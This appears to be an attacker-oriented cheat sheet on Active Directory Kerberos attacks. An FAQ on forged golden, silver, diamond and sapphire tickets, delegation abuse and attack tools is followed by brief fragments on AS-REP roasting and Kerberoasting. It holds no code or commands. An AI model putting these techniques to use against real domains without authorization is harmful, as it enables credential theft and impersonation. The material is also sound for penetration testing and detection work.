What is the difference between golden and silver tickets?

Golden tickets forge a TGT using the krbtgt hash and allow impersonation of any user domain-wide. Silver tickets forge a TGS using a service account hash and grant access only to that specific service without KDC interaction. Golden tickets are more powerful but require KDC interaction; silver tickets are stealthier for targeted access.

How long do forged tickets remain valid?

Golden tickets are valid until the krbtgt password is changed twice (typically 180 days if never reset). Silver tickets are valid for the service ticket lifetime (default 10 hours). Diamond and sapphire tickets inherit the validity period of the legitimate TGT they modify or reference.

What is the difference between constrained delegation and RBCD?

Constrained delegation (S4U2Proxy) is configured on the service account itself via msDS-AllowedToDelegateTo and requires the service account's credentials. RBCD is configured on the target resource via msDS-AllowedToActOnBehalfOfOtherIdentity and requires write access to the target, allowing any controlled account to impersonate users to that target.

Can I detect forged tickets?

Golden tickets are difficult to detect without monitoring krbtgt usage patterns. Silver tickets are harder to detect since they bypass the KDC. Diamond and sapphire tickets are the hardest to detect because their metadata matches legitimate tickets. Detection relies on behavioral analysis, unusual service access patterns, and monitoring for ticket reuse.

What tools should I use for Kerberos attacks?

Impacket (GetNPUsers.py, GetUserSPNs.py, ticketer.py, getST.py) for Linux-based attacks; Rubeus for Windows-based ticket operations; Mimikatz for ticket injection and golden ticket forging; PowerView for AD enumeration. Choose based on your access level and target environment.

2. AS-REP ROASTING

Users with "Do not require Kerberos preauthentication" can be queried for AS-REP without knowing their password.

3. KERBEROASTING

Any domain user can request TGS for accounts with SPNs. The TGS is encrypted with the service account's NTLM hash.

Golden Ticket

Forge TGT using the krbtgt hash → impersonate any user, including non-existent ones.

Diamond Ticket

Modify a legitimately issued TGT → harder to detect than golden ticket.

Advantage: The ticket's metadata (timestamps, enc type) matches a real TGT issuance.

Sapphire Ticket

Uses S4U2Self to get a real PAC for the target user, then embeds it in a forged ticket.

Advantage: PAC is a genuine copy from KDC, making detection extremely difficult.

Unconstrained Delegation

Hosts with unconstrained delegation store user TGTs in memory.
